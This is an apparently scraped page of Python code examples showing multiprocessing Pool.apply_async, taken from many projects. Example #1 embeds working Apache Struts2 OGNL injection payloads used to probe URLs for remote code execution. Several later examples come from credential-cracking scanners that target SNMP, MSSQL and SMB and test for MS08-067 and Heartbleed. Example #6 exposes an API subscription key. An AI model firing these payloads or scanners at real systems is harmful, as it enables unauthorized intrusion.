Python Pool.apply_async Examples, multiprocessing.dummy.Pool.apply_async Python Examples

Example #1

0

Show file

File: structscan.py Project: jokeywhy/st2-exp

def check_struct(url):
    global types
    global isvul
    isvul = False
    types = []
    payloads = []

    s2_16payload = r'redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%22dir%3A%22%2B%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'
    s2_19payload = r'debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()'
    s2_32payload = r'method:%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8&web=web&path=path%3a'
    s2_33payload = r'/%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=shuaida'
    s2_37payload = r'/%28%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=shuaida'
    s2_devmode_payload = r'debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=devMode dir--***'

    payloads.append(setPayload(s2_16payload, 's2_16payload'))
    payloads.append(setPayload(s2_19payload, 's2_19payload'))
    payloads.append(setPayload(s2_32payload, 's2_32payload'))
    payloads.append(setPayload(s2_33payload, 's2_33payload'))
    payloads.append(setPayload(s2_37payload, 's2_37payload'))
    payloads.append(setPayload(s2_devmode_payload, 's2_devmode_payload'))

    pool = Pool(6)

    for payload in payloads:
        pool.apply_async(func=url_request, args=(url, payload), callback=callback)
    pool.close()
    pool.join()

    if isvul:
        lock.acquire()
        fileSave(url, types)
        vulnerabilitys.append('[+]%s vulnerability exits %s!' % (url.strip(), ','.join(types)))
        lock.release()

    types = []

Example #2

0

Show file

File: mongo_test.py Project: dsschult/file_catalog

def main():
    n = 1000000
    m = 1
    m2 = 10000
    m3 = 100
    
    create_db()

    pool = Pool(processes=5)
    start = time.time()
    fill(n)
    fill_time = time.time() - start
    print('{} inserts in {}s'.format(n,fill_time))

    start = time.time()
    results = []
    for _ in range(m):
        results.append(pool.apply_async(read, ()))
#        results.append(pool.apply_async(read_dataset, ()))
        for i in range(m2):
            results.append(pool.apply_async(read_one, ()))
            if i%m3 == 0:
                results.append(pool.apply_async(fill, (1,)))
    for r in results:
        r.get(timeout=1000000)
    read_time = time.time() - start
    pool.terminate()

    print('{}.{} reads in {}s'.format(m,m2,read_time))

Example #3

0

Show file

File: all_or_nothing.py Project: AequilibraE/AequilibraE

    def execute(self):
        if pyqt:
            self.assignment.emit(['zones finalized', 0])

        self.aux_res.prepare(self.graph, self.results)
        self.matrix.matrix_view = self.matrix.matrix_view.reshape((self.graph.num_zones, self.graph.num_zones,
                                                                   self.results.classes['number']))
        mat = self.matrix.matrix_view
        pool = ThreadPool(self.results.cores)
        all_threads = {'count': 0}
        for orig in self.matrix.index:
            i = int(self.graph.nodes_to_indices[orig])
            if np.nansum(mat[i, :, :]) > 0:
                if self.graph.fs[i] == self.graph.fs[i+1]:
                    self.report.append("Centroid " + str(orig) + " is not connected")
                else:
                    pool.apply_async(self.func_assig_thread, args=(orig, all_threads))
                    # one_to_all(orig, self.matrix, self.graph, self.results, self.aux_res, 0)
        pool.close()
        pool.join()
        self.results.link_loads = np.sum(self.aux_res.temp_link_loads, axis=2)

        if pyqt:
            self.assignment.emit(['text AoN', "Saving Outputs"])
            self.assignment.emit(['finished_threaded_procedure', None])

Example #4

0

Show file

File: views.py Project: crazydreamer/jobvite2.0

def apply(request, company_id):
	user = User.objects.get(email=request.user)
	company = Company.objects.filter(id=company_id)[0]
	if not user.profile or not user.profile.address:
		return HttpResponseRedirect('/profile/')
	if user.num_apps_left_today == 0:
		context = {}
		context['message'] = 'Sorry, you have exceeded max number of apps available per day. We are forced to have a cap because of limited server capabilities.'
		return render(request, 'thankyou.html', context)
	app = Application(user=user, company=company)
	app.save()
	user.num_apps_left_today -= 1
	user.save()
	pool = Pool(processes=1)
	def fill():
		url = random.choice(Client.objects.all()).ip + "fill"
		user_json = UserToJson(UserPlain(user))
		param = {'user':user_json, 'company_name':company.name, 'app_id':app.id}
		r = requests.get(url, params=param)
	pool.apply_async(fill)
	context = {}
	context['message'] = 'Thanks for applying. Our automated system will be filling out your app in the next 10 mins. Check your email for confirmation.'
	if user.num_apps_left_today == daily_allowed_apps -1:
		context['company'] = company
	return render(request, 'thankyou.html', context)

Example #5

0

Show file

File: controller.py Project: stephen-e-cox/Gooey

 def run_client_code(self, command):
     env = os.environ.copy()
     env["GOOEY"] = "1"
     print "run command:", command
     p = subprocess.Popen(command, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, env=env)
     self._process = p
     pool = Pool(1)
     pool.apply_async(self.read_stdout, (p, self.process_result))

Example #6

0

Show file

File: query_yield.py Project: a3616001/Mania

def query(id1, id2):
	#now = time.time()
	#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:desc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
	#json1 = json.loads((urllib.urlopen(url)).read())['entities']
	#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:asc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
	#json2 = json.loads((urllib.urlopen(url)).read())['entities']
	#print 'time use: ', time.time() - now
	#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=1&attributes=Id,AA.AuId,AA.AfId&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
	#json1 = (json.loads((urllib.urlopen(url)).read()))['entities']
	#url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=1&attributes=Id,AA.AuId,AA.AfId&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
	#json2 = (json.loads((urllib.urlopen(url)).read()))['entities']

	url1 = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:desc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
	url2 = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:asc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
	poolResult = []
	pool = Pool(20)
	poolResult.append(pool.apply_async(lambda url: json.loads((urllib.urlopen(url)).read())['entities'], (url1,)))
	poolResult.append(pool.apply_async(lambda url: json.loads((urllib.urlopen(url)).read())['entities'], (url2,)))
	poolResult.append(pool.apply_async(getPaperJson, (id1, 'RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId')))
	poolResult.append(pool.apply_async(getPaperJson, (id2, 'F.FId,J.JId,C.CId,AA.AuId,AA.AfId,CC')))
	pool.close()
	#pool.join()
	json1 = poolResult[0].get()
	json2 = poolResult[1].get()
	paperJson1 = poolResult[2].get()
	paperJson2 = poolResult[3].get()
	# print len(json2)
	
	if json1 and json2:
		#afId1 = -1
		#afId2 = -1
		#for author in json1[0]['AA']:
		#	if author['AuId'] == id1 and author.has_key('AfId'):
		#		afId1 = author['AfId']
		#for author in json2[0]['AA']:
		#	if author['AuId'] == id2 and author.has_key('AfId'):
		#		afId2 = author['AfId']
		#return query_AuId_AuId(id1, id2, afId1, afId2)
		return query_AuId_AuId(id1, id2, json1, json2)
	elif json1:
		#afId1 = -1
		#for author in json1[0]['AA']:
		#	if author['AuId'] == id1 and author.has_key('AfId'):
		#		afId1 = author['AfId']
		#return query_AuId_Id(id1, id2, afId1)
		return query_AuId_Id(id1, id2, json1, paperJson2)
	elif json2:
		#afId2 = -1
		#for author in json2[0]['AA']:
		#	if author['AuId'] == id2 and author.has_key('AfId'):
		#		afId2 = author['AfId']
		#return query_Id_AuId(id1, id2, afId2)
		return query_Id_AuId(id1, id2, paperJson1, json2)
	else:
		if paperJson2.has_key('CC') and paperJson2['CC'] >= 50000:
			return query_Id_Id_big(id1, id2, paperJson1, paperJson2)
		else:
			return query_Id_Id_small(id1, id2, paperJson1, paperJson2)

Example #7

0

Show file

File: get_article.py Project: Ivan-wang/index

def get_all_content(path):
    contents = set()
    pool = ThreadPool(100)
    max_page = get_max_page()
    for x in xrange(1, max_page + 1):
        pool.apply_async(get_content, args=(x, contents))
    pool.close()
    pool.join()
    store(path, contents)

Example #8

0

Show file

File: cores.py Project: AliceLanniste/python

def run():
    print 'Parent process %s.' % os.getpid()
    p = Pool()
    for i in range(9):
        p.apply_async(long_time_task, args=(i,))
    print 'Waiting for all sub processes done...'
    p.close()
    p.join()
    print 'All sub processes done.'

Example #9

0

Show file

File: get_blog.py Project: Ivan-wang/index

def get_blog(path):
    pool = ThreadPool(20)
    url = 'http://www.yinwang.org'
    contents = set()
    for blog_url in get_blog_url(url):
        pool.apply_async(get_content, args=(blog_url, contents))
    pool.close()
    pool.join()
    store(path, contents, 'docs_cn')

Example #10

0

Show file

File: produce.py Project: newbelee/opsweb

def Async_log(user,url):
    if 'op.baihe.com' in url:
        mysql_op_log = Mysql.mysql_op(user, url)
        Proc = Pool()
        def Run():
            mysql_op_log.op_log()
        Proc.apply_async(Run)
        Proc.close()
        Proc.join()

Example #11

0

Show file

File: domainalive.py Project: jokeywhy/domaildeal

 def aliveRun(self, threads, domains):
     if type(domains) == type('a'):
         self.alivescan(domains)
     else:
         pool = Pool(threads)
         for domain in domains:
             pool.apply_async(func=self.alivescan, args=(domain,))
         pool.close()
         pool.join()
     print ''
     return self.results

Example #12

0

Show file

File: async_dispatcher.py Project: pndaproject/platform-deployment-manager

class AsyncDispatcher(object):
    """
    Runs blockiong calls as synchronous tasks
    """

    def __init__(self, num_threads=50):
        self.pool = ThreadPool(processes=num_threads)

    def run_as_asynch(self, task, on_success=None, on_error=None, on_complete=None):
        """
        Transforms a blocking call into an asynchronous task
        :param task: a function to run
        :param on_complete: a function to call when the task has finished running.
            Said function should accept the return value of the synchrouns task.
        :return:
        """

        def task_wrapper():
            """
            encapsulates tasks to catch their errors,
            as threadpool does not contain asynch error reporting by default
            """
            try:
                return task()
            except Exception as ex:
                logging.error(traceback.format_exc())
                # report asynchronous exception:
                if on_error:
                    # call callback on result thread (this is the worker thread)
                    self.pool.apply_async(on_error, args=(ex,))
                # call the completion handler:
                if on_complete:
                    # call callback on result thread (this is the worker thread)
                    self.pool.apply_async(on_complete)
                # re-throw execution exeption to get function
                raise Exception(ex)

        def success_wrapper(result):
            """
            called asynchronously when the task has finished running successfully
            """
            # This handler is called on the result thread,
            # so there is no need to reschedule the callback
            #
            # report success:
            if on_success:
                on_success(result)
            # report that task is completed
            if on_complete:
                on_complete()

        # run the task on a different thread:
        result = self.pool.apply_async(task_wrapper, callback=success_wrapper)
        return ScheduledTask(result)

Example #13

0

Show file

File: controller.py Project: matthewmcarlson/Gooey

 def RunClientCode(self, command):
   def doInBackground(process, callback):
     while True:
       line = process.stdout.readline()
       if not line:
         break
       wx.CallAfter(self.core_gui.PublishConsoleMsg, line)
     wx.CallAfter(callback, process)
   p = subprocess.Popen(command, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
   _pool = Pool(1)
   _pool.apply_async(doInBackground, (p, self.HandleResult))

Example #14

0

Show file

File: multipart_object_assembler.py Project: riconnon/oci-python-sdk

    def upload_stream(self, stream_ref, **kwargs):
        if self.manifest["uploadId"] is None:
            raise RuntimeError('Cannot call upload before initializing an upload using new_upload.')

        # The pool of work we have available, and the sempahore to gate work into the pool (since just submitting
        # work to the pool doesn't block on the number of processes available to do work in the pool)
        pool = Pool(processes=self.parallel_process_count)
        semaphore = Semaphore(self.parallel_process_count)

        # A dict which will be shared between the threads in our pool (this would not work as-is with processes) but
        # we use threads via multiprocessing.dummy. If we use processes, then a Manager would likely be needed for this.
        #
        # should_continue will only ever be set to False by _upload_stream_part so not too worried if we have multiple
        # writers
        #
        # Queue should be thread safe (though for tracking the exceptions, order doesn't strictly matter)
        shared_dict = {'should_continue': True, 'exceptions': Queue()}

        part_counter = 0

        apply_async_kwargs = kwargs.copy()
        apply_async_kwargs['semaphore'] = semaphore
        apply_async_kwargs['shared_dict'] = shared_dict

        # We pull data from the stream until there is no more
        keep_reading = True
        while keep_reading:
            if six.PY3:
                read_bytes = stream_ref.buffer.read(self.part_size)
            else:
                read_bytes = stream_ref.read(self.part_size)

            semaphore.acquire()

            if len(read_bytes) != 0:
                pool.apply_async(self._upload_stream_part, (part_counter, read_bytes), apply_async_kwargs)
                part_counter += 1

            keep_reading = (len(read_bytes) == self.part_size) and shared_dict['should_continue']

        # If we're here we've either sent off all the work we needed to (and so are waiting on remaining bits to finish)
        # or we terminated early because of an exception in one of our uploads. In either case, close off the pool to
        # any more work and let the remaining work finish gracefully
        pool.close()
        pool.join()

        # If we had at least one exception then throw out an error to indicate failure
        if not shared_dict['exceptions'].empty():
            raise MultipartUploadError(error_causes_queue=shared_dict['exceptions'])

        # Because we processed in parallel, the parts in the manifest may be out of order. Re-order them based on the part number
        # because commit assumes that they are ordered
        self.manifest['parts'].sort(key=lambda part: part['part_num'])

Example #15

0

Show file

File: AUServerCheck.py Project: zathing/PythonTools

 def check_main(self, xml_file, server):
     # 检查是否选择了文件
     if self.filename == '':
         self.lb.config(text="请先选择 index.xml 文件")
     else:
         self.lfc_field_1_t.insert(END, 'Start [%s]\n' % xml_file, 'blue')
         self.lfc_field_1_t.insert(END, '========================================================================================================================\n')
         self.lfc_field_1_t.update()
         component_num = set()
         url_num = 0
         # 检查 ini 配置文件是否存在
         if os.path.isfile(server):
             tree = ET.ElementTree(file=xml_file)
             iau_url = ''
             # 使用线程池，否则打包后的exe由于IO太高容易异常
             async_pool = ThreadPool(100)
             for product in tree.findall('products'):
                 pid = 'c' + product.attrib['class'] + 't' + product.attrib['type'] + 'v' + product.attrib['ver'] + 'l' + product.attrib['lang'] + 'p' + product.attrib['plat'] + 'r' + product.attrib['region'] + 'o' + product.attrib['oem']
                 p = re.compile(r'%s$' % pid)
                 with open(server, 'r') as f:
                     for line in f.readlines():
                         if re.search(p, line.strip()):
                             iau_url = line.strip()
                             url_num += 1
                             break
                 if iau_url == '':
                     self.lfc_field_1_t.insert(END, '%s 对应的 URL 在 ini 配置文件中未找到，请检查配置！\n' % pid, 'red')
                     self.lfc_field_1_t.update()
                 else:
                     component_list = set()
                     # .//entity 表示搜索当前 products 下的所有 entity
                     for entity in product.findall('.//entity'):
                         component = entity.attrib['name']
                         component_num.add(component)
                         component_list.add(component)
                     async_pool.apply_async(self.iau_check, (component_list, iau_url))
             async_pool.close()
             async_pool.join()
         else:
             self.lfc_field_1_t.insert(END, '未找到 %s 配置文件，请确保该配置文件存放在 exe 同目录下！\n' % server, 'red')
             self.lfc_field_1_t.update()
         self.lfc_field_1_t.insert(END, '========================================================================================================================\n')
         self.lfc_field_1_t.insert(END, 'End [%s]\n' % xml_file, 'blue')
         self.lfc_field_1_t.insert(END, '---- 本次 AU 涉及 % s 个 component，%s 个 product \n' % (len(component_num), url_num), 'blue')
         self.lfc_field_1_t.insert(END, '---- Pass: % s 个 \n' % self.pass_num, 'blue')
         self.lfc_field_1_t.insert(END, '---- Fail: % s 个 \n\n' % self.fail_num, 'blue')
         self.pass_num = 0
         self.fail_num = 0
         self.lfc_field_1_t.update()
         self.lfc_field_1_t.see(END)

Example #16

0

Show file

File: EventManager.py Project: BroHui/EventDispatch

class EventManager:
    """
    事件分发
    """
    def __init__(self):
        """
        初始化
        """
        self.__event_handler = {}
        self.__pool = Pool(5)

    def add_event_handler(self, event_type, handler):
        """
        注册 event handler
        :param event_type: 事件类型
        :type event_type: object
        :param handler: Event Handler
        :type handler: function
        """
        self.__event_handler.setdefault(event_type, []).append(handler)

    def dispatch_event(self, event):
        """
        分发事件
        :param event: 事件
        :type event: Event
        :return: 是否分发成功
        :rtype: bool
        """
        try:
            handlers = self.__event_handler.get(event.__class__, [])
            for handler in handlers:
                self.__pool.apply_async(
                    func=handler,
                    args=(event,),
                    callback=self.__handler_callback
                )
            return True
        except:
            traceback.print_exc()
            return False

    def __handler_callback(self, result):
        """
        进程回调
        :param result: 返回值
        :type result: str
        """
        print time.ctime(), (result)

Example #17

0

Show file

File: download.py Project: datamade/lobbying_federal_domestic

def download_all(vals, get_response_loc_pair, options):
    threaded = options.get('threaded', False)
    thread_num = options.get('thread_num', 4)

    if threaded:
        pool = ThreadPool(thread_num)
        for val in vals:
            pool.apply_async(download, args=(val, get_response_loc_pair),
                             callback=log_result)
        pool.close()
        pool.join()
    else:
        for val in vals:
            response_loc_pair = get_response_loc_pair(val)
            log_result(download(response_loc_pair))

Example #18

0

Show file

File: views.py Project: crazydreamer/jobvite2.0

def fill(request):
	json = request.GET['user']
	user = JsonToUser(json)
	user.getResume()
	company_name = request.GET['company_name']
	form = form_dict[company_name]
	form_fill(user, form)
	user.deleteResume()
	pool = Pool(processes=1)
	def fill():
		url = Server.objects.all()[0].ip + "confirm_app"
		param = {'app_id':request.GET['app_id'], 'status':"success"}
		r = requests.get(url, params=param)
	pool.apply_async(fill)
	return HttpResponse("lol")

Example #19

0

Show file

File: snmp.py Project: likebin16/PEST

    def run(self,ipdict,pinglist,threads,file):
        printPink("crack snmp now...")
        print "[*] start crack snmp %s" % time.ctime()
        starttime=time.time()
        pool=Pool(threads)
        for ip in pinglist:
            pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],""))

        pool.close()
        pool.join()

        print "[*] stop crack snmp %s" % time.ctime()
        print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime)
        
        for i in xrange(len(self.result)):
            self.config.write_file(contents=self.result[i],file=file)

Example #20

0

Show file

File: mssql.py Project: likebin16/PEST

    def run(self,ipdict,pinglist,threads,file):
        if len(ipdict['mysql']):
            printPink("crack sql serice  now...")
            print "[*] start crack sql serice  %s" % time.ctime()
            starttime=time.time()
            pool=Pool(threads)
            for ip in ipdict['mssql']:
                pool.apply_async(func=self.mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
            pool.close()
            pool.join()

            print "[*] stop crack sql serice  %s" % time.ctime()
            print "[*] crack sql serice  done,it has Elapsed time:%s " % (time.time()-starttime)

            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file)

Example #21

0

Show file

File: download.py Project: influence-usa/campaign-finance_federal

def download_all_http(vals, get_response_loc_pair, options):
    threaded = options.get('threaded', False)
    thread_num = options.get('thread_num', 4)

    if threaded:
        log.info("starting threaded download")
        pool = ThreadPool(thread_num)
        for val in vals:
            log.debug("async start for {}".format(str(val)))
            pool.apply_async(download_http, args=(val, get_response_loc_pair),
                             callback=log_result)
        pool.close()
        pool.join()
    else:
        for val in vals:
            log_result(download_http(val, get_response_loc_pair))

Example #22

0

Show file

File: one_class.py Project: ricrosales/StudentAttrition

def multithread(function, items, extra_variable, threads=2):
    """ Takes the main function to run in parallel, inputs the variable(s) and returns the results.
    :param function: The main function to process in parallel.
    :param items: A list of strings that are passed into the function for each thread.
    :param extra_variable: One additional variable that can be passed into the function.
    :param threads: The number of threads to use. The default is 2, but the threads are not CPU core bound.
    :return: The results of the function passed into this function.
    """

    if __name__ == '__main__':

        # """ A CPU core dependent multiprocessing technique.
        # The synchronized variant, which locks the main program until a process is finished. Order is retained. """
        # pool = Pool(threads)
        # results = [pool.apply(function, args=(item, extra_variable)) for item in items]
        # pool.close()
        # pool.join()

        # """ A thread dependent multiprocessing technique. Theoretically, an unlimited number of threads can be used.
        # The synchronized variant, which locks the main program until a process is finished. Order is retained. """
        # pool = ThreadPool(threads)
        # results = [pool.apply(function, args=(item, extra_variable)) for item in items]
        # pool.close()
        # pool.join()

        """ A thread dependent multiprocessing technique. Theoretically, an unlimited number of threads can be used.
        The async variant, which submits all processes at once and retrieve the results as soon as finished. """
        pool = ThreadPool(threads)
        output = [pool.apply_async(function, args=(item, extra_variable)) for item in items]
        results = [p.get() for p in output]

        return results

Example #23

0

Show file

File: complete_info.py Project: WeKeyPedia/toolkit-python

def main():
	print "create initial dataset directory: [./dataset]"

	directory = "dataset"

	if not os.path.exists(directory):
		os.makedirs(directory)

	pages = []

	pages = api.get_pages()
	# pages = pages[0:50]

	pool = ThreadPool(8)

	l = len(pages)
	i = 0

	for p in pages:
		x = pool.apply_async(get_page_info, args=(p["url"], l, i, ))
		# x.get()
		i = i + 1

	pool.close()
	pool.join()

Example #24

0

Show file

File: multiexec.py Project: snwhite777/multiexec

def abortable_func(func, *args, **kwargs):
	"""
	The abortable_func is the wrapper function, which wraps around function type "func", call 
	  it in a background thread (multiprocessing.dummy.Thread), and terminates it after
	  "timeout" seconds.
	This function is inspired by 
	  http://stackoverflow.com/questions/29494001/how-can-i-abort-a-task-in-a-multiprocessing-pool-after-a-timeout
	  but is an improvement over the original solution, since the original solution is only 
	  applicable to a function that takes positional arguments.

	Parameters of the function:
	  func - the function that will be called and terminated if not return with "timeout" seconds
	  *args - positional arguments of "func"
	  **kwargs - named arguments of "func" + "timeout" value
	"""
	
	#- Get "timeout" value and create a ThreadPool (multiprocessing.dummy.Pool) 
	#  with only 1 worker. 
	#- Use functools.partial (https://docs.python.org/3/library/functools.html)
	#  to fit all the arguments of the func into the interface of
	#  Pool.apply_async function
	timeout = kwargs.pop('timeout', None);
	p = ThreadPool(1);
	partial_func = partial(func,**kwargs);
	res = p.apply_async(partial_func,args);

	#- Terminate the thread if it does not return after "timeout" seconds
	#  otherwise return the returned value of func
	try:
		out = res.get(timeout);
		return out
	except TimeoutError:
		p.terminate()
		return "{}:Timeout exceeded. Process terminated.\r\n".format(args[0]);

Example #25

0

Show file

File: domainsc.py Project: 0x0mar/swarm

class DomainScanner(object):
	"""
	Subdomain name scanner provides functions complete brute force and dictionary 
	brute force.
	"""
	def __init__(self,thread_num,timeout):
		super(DomainScanner, self).__init__()
		self._pool=Pool(thread_num)
		self._timeout=timeout
	
	def complete_brute(self,target,charset,begin_str,end_str):
		result=''
		resultl=[]
		bflist=generate_bflist(charset,begin_str,end_str)
		for cur in bflist:
			cur_target=cur+'.'+target
			resultl.append(self._pool.apply_async(self._scan_target,args=(cur_target,)))
		# get result from list
		for cur in resultl:
			try:
				result+=cur.get(timeout=self._timeout)
			except TimeoutError, e:
				continue
		# deal with result
		if result=='':
			result='no subdomain'
		else:
			result=result[:-1]
		return result

Example #26

0

Show file

File: download.py Project: influence-usa/campaign-finance_federal

def download_all_ftp(url, download_fct, download_args, options):
    threaded = options.get('threaded', False)
    thread_num = options.get('thread_num', 4)

    if threaded:
        log.info("starting threaded download")
        pool = ThreadPool(thread_num)
        for val in download_args:
            log.debug("async start for {}".format(str(val)))
            pool.apply_async(download_fct, args=(val,),
                             callback=log_result)
        pool.close()
        pool.join()
    else:
        for val in download_args:
            log_result(download_fct(val))

Example #27

0

Show file

File: web.py Project: 5up3rc/fenghuangscanner_v3

    def run(self,ipdict,pinglist,threads,file):
        if len(ipdict['http']):
            print "[*] start test web burp at %s" % time.ctime()
            starttime=time.time()

            pool=Pool(threads)

            for ip in ipdict['http']:
                pool.apply_async(func=self.webmain,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
            pool.close()
            pool.join()

            print "[*] stop test iip_put&&scanner web paths at %s" % time.ctime()
            print "[*] test iip_put&&scanner web paths done,it has Elapsed time:%s " % (time.time()-starttime)

            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file)

Example #28

0

Show file

File: smb.py Project: gamehacker/fenghuangscanner_v2.1

def smb_main(ipdict,threads):
    printPink("crack smb  now...")
    print "[*] start crack smb serice  %s" % time.ctime()
    starttime=time.time()

    global lock
    lock = threading.Lock()
    global result
    result=[]

    pool=Pool(threads)

    for ip in ipdict['smb']:
        pool.apply_async(func=smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))

    pool.close()
    pool.join()



    print "[*] stop smb serice  %s" % time.ctime()
    print "[*] crack smb  done,it has Elapsed time:%s " % (time.time()-starttime)



#------------------------------------------------------------------
#------------------------割----------------------------------------
#------------------------------------------------------------------

# test ms08_067
    printPink("test ms_08_067  now...")
    print "[*] test ms_08_067  at  %s" % time.ctime()
    starttime=time.time()

    pool=Pool(threads)

    for ip in ipdict['smb']:
        pool.apply_async(func=check,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))

    pool.close()
    pool.join()


    print "[*] done test ms_08_067  now :%s " % (time.time()-starttime)
    return result

Example #29

0

Show file

File: ssltest.py Project: PHPPlay/fenghuangscanner_v2

def openssl_main(ipdict, threads):
    printPink("crack ssl  now...")
    print "[*] start test openssl_heart  %s" % time.ctime()
    starttime = time.time()

    global lock
    lock = threading.Lock()
    global result
    result = []
    pool = Pool(threads)
    for ip in ipdict["http"]:
        pool.apply_async(func=openssl_test, args=(str(ip).split(":")[0], int(str(ip).split(":")[1])))
    pool.close()
    pool.join()

    print "[*] stop ssl serice  %s" % time.ctime()
    print "[*] crack ssl done,it has Elapsed time:%s " % (time.time() - starttime)
    return result

Example #30

0

Show file

File: mssql.py Project: Jonnyliu/fenghuangscanner_v2

def mssql_main(ipdict,threads):
    printPink("crack sql serice  now...")
    print "[*] start crack sql serice  %s" % time.ctime()
    starttime=time.time()
    pool=Pool(threads)
    global lock
    lock = threading.Lock()
    global result
    result=[]

    for ip in ipdict['mssql']:
        pool.apply_async(func=mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))

    pool.close()
    pool.join()

    print "[*] stop crack sql serice  %s" % time.ctime()
    print "[*] crack sql serice  done,it has Elapsed time:%s " % (time.time()-starttime)
    return result

Example #31

0

Show file

File: crawler.py Project: wgwjifeng/hithithit

urls = moz_top_500_urls.split()
"""
for url in urls:
    print("[+] requesting [http://www." + url + "]......")
    try:
        requests.get("http://"+url, timeout=0.1)
    except KeyboardInterrupt:
        sys.exit(1)
    except Exception as e:
        #print(str(e))
        sys.exit()
        pass
"""
pool = Pool(500)
futures = []
for url in urls:
    futures.append(pool.apply_async(requests.get, ["http://"+url]))
 
 
i = 0
for future in futures:
    print("[+] requesting [http://www." + urls[i] + "]......")
    i = i + 1
    try:
        future.get()
    except KeyboardInterrupt:
        sys.exit()
    except Exception as e:
        print(str(e))
    #req_proc= multiprocessing.Process(target=requests.get, args=("http://" + url,), kwargs={'timeout':1,})
    #req_proc.start()

Example #32

0

Show file

File: test.py Project: xfxCSB/ClickHouse

def test_simple_replication_and_moves(start_cluster):
    try:
        for i, node in enumerate([node1, node2]):
            node.query("""
                CREATE TABLE replicated_table_for_moves (
                    s1 String
                ) ENGINE = ReplicatedMergeTree('/clickhouse/replicated_table_for_moves', '{}')
                ORDER BY tuple()
                SETTINGS storage_policy='moving_jbod_with_external', old_parts_lifetime=1, cleanup_delay_period=1, cleanup_delay_period_random_add=2
            """.format(i + 1))

        def insert(num):
            for i in range(num):
                node = random.choice([node1, node2])
                data = []  # 1MB in total
                for i in range(2):
                    data.append(get_random_string(512 * 1024))  # 500KB value
                node.query(
                    "INSERT INTO replicated_table_for_moves VALUES {}".format(
                        ','.join(["('" + x + "')" for x in data])))

        def optimize(num):
            for i in range(num):
                node = random.choice([node1, node2])
